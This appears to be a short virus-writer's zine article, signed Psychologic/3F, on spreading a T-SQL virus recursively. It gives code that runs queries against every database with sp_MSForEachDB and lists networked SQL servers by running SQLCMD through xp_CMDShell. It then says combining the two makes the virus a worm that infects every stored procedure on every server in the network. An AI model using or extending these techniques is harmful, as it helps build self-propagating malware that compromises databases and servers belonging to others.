Recursive infection in T-SQL viruses.. 

.Author Notes

Viruses are lame thing,  it won't give you any benefit in your real life
everybody hates virus. So don't code virus if you don't have something new
in it. It just wasting your time, and your time can be converted to money

.About The Theory

It is important for a kind of virus to infect outside current directory, you can
see much virus code in physical file doing travel directory for infection, but 
is it posible to do recursive  infection (travel directory) in SQL viruses ?

and the answer is YES

Ofcourse yes, 100% competible to code recursive infection in T-SQL viruses

.How ?

This, an example to execute query at all database object in current single server
------------------------------------------------------------------------code cut

create table #tempschema 
(name varchar(100),
 schema_id int,
 principal_id int)
 
INSERT INTO #tempschema
EXEC sp_MSForEachDB 'select * from [?].sys.schemas'
 
select distinct * from #tempschema
drop table #tempschema

----------------------------------------------------------------------code cut


------------------------------------------------------------------------code cut
-- And this query will show you every sql server connected to the network

CREATE TABLE #servers(sname VARCHAR(255))
	INSERT #servers (sname)

EXEC master..xp_CMDShell 'SQLCMD -L'

DELETE FROM #servers WHERE (sname='Servers:') 
OR (sname IS NULL) 
or sname=''

select * from #servers
----------------------------------------------------------------------code cut

If you combine both technique, your virus will also become a worm, it will infect
every stored procedure at every databases on every servers in the network, woww..
thats amazing thing..

.Psychologic/3F